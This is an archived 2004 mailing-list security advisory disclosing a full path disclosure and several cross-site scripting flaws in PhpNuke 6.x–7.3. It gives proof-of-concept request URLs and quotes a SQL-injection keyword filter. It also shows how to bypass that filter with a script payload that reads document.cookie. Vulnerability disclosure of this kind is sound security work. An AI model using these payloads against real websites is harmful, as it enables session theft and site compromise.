lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040517183423.64423.qmail@web50803.mail.yahoo.com>
From: come2waraxe at yahoo.com (Janek Vind)
Subject: [waraxe-2004-SA#030 - Multiple vulnerabilities in PhpNuke 6.x - 7.3]


{================================================================================}
{                              [waraxe-2004-SA#030]   
                          }
{================================================================================}
{                                                     
                          }
{               [ Multiple vulnerabilities in PhpNuke
6.x - 7.3 ]                }
{                                                     
                          }
{================================================================================}
                                                      
                                                      
                  
Author: Janek Vind "waraxe"
Date: 17. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=30


Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management
system, written in php by
Francisco Burzi. This CMS (Content Management System)
is used on many thousands
websites, because it's freeware, easy to install and
has broad set of features.

Homepage: http://phpnuke.org


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

So PhpNuke version 7.3 is out allready and has
improved by security means.
Anyway, i have found many unpublished security flaws
in it, not fixed yet in 7.3
version and one security hole is brandnew -  from
integrated nukecops union tap ;)
Time is money, so let's start our journey to PhpNuke's
(in)security world...


A. Full path disclosure:

A1 - full path disclosure through unsanitized variable
"show" in "WebLinks" module:

http://localhost/nuke73/modules.php?name=Web_Links&l_op=viewlink&cid=1&show=foobar

Warning: Division by zero in
D:\apache_wwwroot\nuke73\modules\Web_Links\index.php
on line 774



B. Cross-site scripting aka XSS:

B1 - XSS through uninitialized variable "optionbox" in
"News" module:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=[xss
code here]


B2 - XSS through unsanitized variable "date" in
"Statistics" module:

http://localhost/nuke73/modules.php?name=Statistics&op=DailyStats&year=2004&month=5&date=[xss
code here]


B3 - XSS through unsanitized variables in
"Stories_Archive" module:

http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=[xss
code here]&month=05&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=[xss
code here]&month_l=May
http://localhost/nuke73/modules.php?name=Stories_Archive&sa=show_month&year=2004&month=05&month_l=[xss
code here]


B4 - XSS through unsanitized variables in "Surveys"
module:

http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=[xss
code here]&order=0&thold=0
http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=[xss
code here]&thold=0
http://localhost/nuke73/modules.php?name=Surveys&file=comments&op=Reply&pid=1&pollID=1&mode=thread&order=&thold=[xss
code here]


B5 - XSS through nukecops UnionTap Sql Prevention
Code:

Well, you know, this is my favourite one - securing
one hole will induct new one.
Let's look at beginning of the "mainfile.php" from
PhpNuke 7.3 : 


//Union Tap
//Copyright Zhen-Xjell 2004 http://nukecops.com
//Beta 3 Code to prevent UNION SQL Injections
unset($matches);
unset($loc);
if (preg_match("/([OdWo5NIbpuU4V2iJT0n]{5}) /",
rawurldecode($loc=$_SERVER["QUERY_STRING"]),
$matches)) {
	die("YOU ARE SLAPPED BY <a
href=\"http://nukecops.com\">NUKECOPS</a> BY USING
'$matches[1]' INSIDE '$loc'.");
}


So this clever code will catch up nonmasked sql
injection attempts, made through "GET" request...
Let's try this request:

http://localhost/nuke73/index.php?foo=bar%20union%20select

and we see nice message like this:

YOU ARE SLAPPED BY NUKECOPS BY USING 'union' INSIDE
'foo=bar%20union%20select'.

Uh, how scary...
But what, if we issue request like this (try it with
M$ Internet Explorer for succes!):

http://localhost/nuke73/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>

Oops, nice case of cross-site scripting! And because
anti-xss filtering code is located 
AFTER UnionTap, then we can use even most common
"<script>" tags...

Heya to nukecops and have a nice day :)



How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wanna know, how to patch those security holes? Then
you are welcome to visit
forum on my homepage at http://www.waraxe.us/forum/
See ya there!



Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in
Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    come2waraxe@...oo.com
    Janek Vind "waraxe"

    Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------



	
		
__________________________________
Do you Yahoo!?
SBC Yahoo! - Internet access at a great low price.
http://promo.yahoo.com/sbc/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ